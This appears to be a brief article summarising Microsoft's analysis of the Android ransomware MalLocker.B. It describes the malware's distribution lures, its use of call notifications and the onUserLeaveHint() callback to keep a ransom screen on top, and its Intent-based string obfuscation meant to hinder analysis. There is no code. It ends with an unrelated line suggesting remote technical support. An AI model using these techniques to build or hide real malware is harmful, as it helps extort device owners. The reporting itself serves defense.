In October of 2020, the Microsoft 365 Defender Research Team discovered a piece of sophisticated Android ransomware that utilized new techniques and behavior. Microsoft Defender detected the mobile ransomware as AndroidOS/MalLocker.B. This new Android malware variant is part of a ransomware family that’s been in the wild for a while but has continued to evolve.
This family of ransomware is being hosted on arbitrary websites and circulated on online forums using several different social engineering lures, which include posing as popular apps, cracked games, or media players. This new variant caught Microsoft’s attention because of its sophistication and the fact that it has managed to evade many available protections.
Like most Android ransomware, this new strain doesn’t block access to files by encrypting them. Instead, it will block access to files by displaying a screen that appears over every other window. The displayed screen is the ransom note, which contains instructions on how to pay the ransom.
MalLocker ransomware has an innovative new way of displaying its ransom note. The ransomware displays its ransom note using Android features we haven’t seen leveraged by any previous malware strain, including the “call” notification, among other Android notifications that require immediate user attention.
It also employs the “onUserLeaveHint()” callback method of Android Activity when the ransom note is about to go into the background due to user choice; for example, when the user presses the Home key. This malware uses these two components to create a notification that triggers the ransom screen via the call notification.
MalLocker Employs a New Method of Decryption
MalLocker uses a unique decryption routine as the string values passed to the decryption function do not actually correspond to the decrypted value. They are designed to correspond to junk code to hinder analysis.
On the Android platform, Intent is a software mechanism that allows users to coordinate the functions of separate Activities to perform a task. In essence, it’s a messaging object that can be used to request action from another app component.
The Intent object carries a string value as an “action” parameter. MalLocker creates an Intent inside the decryption function using the string value passed as the name for the so-called Intent. It then decrypts a hardcoded encrypted value and sets an “action” parameter for the Intent using the “setAction” API.
Once this Intent object is generated with an action value pointing to the decrypted content, the decryption function then returns the Intent object to the callee. The callee will then invoke the “getAction” method to get the decrypted content. Unique indeed!
If you are still having trouble, consider contacting remote technical support options.